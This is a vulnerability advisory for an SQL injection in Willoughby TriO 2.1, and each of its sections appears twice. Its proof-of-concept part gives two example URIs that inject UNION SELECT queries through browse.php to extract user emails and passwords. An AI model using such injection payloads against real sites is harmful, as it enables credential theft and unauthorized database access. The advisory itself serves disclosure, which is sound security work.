Willoughby TriO SQL Injection Vulnerability
BID:30384
Info
Willoughby TriO SQL Injection Vulnerability
| Bugtraq ID: | 30384 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Jul 26 2008 12:00AM |
| Updated: | Jul 28 2008 06:07PM |
| Credit: | dun |
| Vulnerable: |
Willoughby TriO 2.1 |
| Not Vulnerable: | |
Discussion
Willoughby TriO SQL Injection Vulnerability
Willoughby TriO is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Versions up to and including TriO 2.1 are vulnerable.
Willoughby TriO is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Versions up to and including TriO 2.1 are vulnerable.
Exploit / POC
Willoughby TriO SQL Injection Vulnerability
Attackers can use a browser to exploit this issue.
The following example URIs are available:
http://site.com/browse.php?id=-1+UNION+SELECT+EMAIL+from+Webusers--
http://site.com/browse.php?id=-1+UNION+SELECT+SUPERSECRETPASSWORD+from+Webusers--
Attackers can use a browser to exploit this issue.
The following example URIs are available:
http://site.com/browse.php?id=-1+UNION+SELECT+EMAIL+from+Webusers--
http://site.com/browse.php?id=-1+UNION+SELECT+SUPERSECRETPASSWORD+from+Webusers--
Solution / Fix
Willoughby TriO SQL Injection Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].